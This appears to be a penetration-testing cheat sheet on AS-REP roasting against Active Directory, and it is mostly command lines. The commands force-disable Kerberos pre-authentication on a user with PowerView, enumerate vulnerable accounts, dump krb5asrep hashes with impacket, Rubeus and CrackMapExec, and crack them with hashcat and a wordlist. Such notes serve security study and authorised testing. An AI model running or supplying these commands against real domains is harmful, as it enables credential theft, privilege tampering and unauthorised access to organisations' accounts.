Dump krbasrep5 hashes of user accounts without Kerberos pre-authentication
Users do not have to be service accounts
Must have pre-authentication disabled
Can request any authentication data (encrypted TGT) for any user since KDC skips validation
Crack dumped hash with hashcat
Exploitation
Force Disable Kerberos Preauth
# Using PowerView 3.0/dev# Enumerate permissions for RDPUsers on ACLSInvoke-ACLScanner-ResolveGUIDS |?{ $_.IdentityReferenceName-match"RDPUsers" }# Disable preauth for userSet-DomainObject-Identity Control572User -XOR@{useraccountcontrol=4194304} -Verbose
Enumerate Users with Preauth Disabled
# Using PowerView 3.0/devGet-DomainUser-PreauthNotRequired -Verbose | Select samaccountname# Using AD ModuleGet-ADUser-Filter { DoesNotRequirePreAuth -eq$true } -Properties DoesNotRequirePreAuth# Query AS-REP-roastable users with impacket from Kali host# Supply userlist and don't require authenticationGetNPUsers.py -dc-ip 10.10.149.145 -no-pass -usersfile users.txt -format hashcat -outputfile hashes.asrep spookysec.local/
# Dump KRBASREP5 hash for specific user and output in hashcat format to file.\Rubeus.exe asreproast /user:control572user /format:hashcat /outfile:control572user.asrep# Dump hashes with credentials using CrackMapExeccrackmapexec ldap 10.0.2.11-u 'username'-p 'password'--kdcHost 10.0.2.11--asreproast output.txt# Transfer hash onto attacker and insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User.....# Crack hash with hashcathashcat -a 0-m 18200 hash.txt rockyou.txt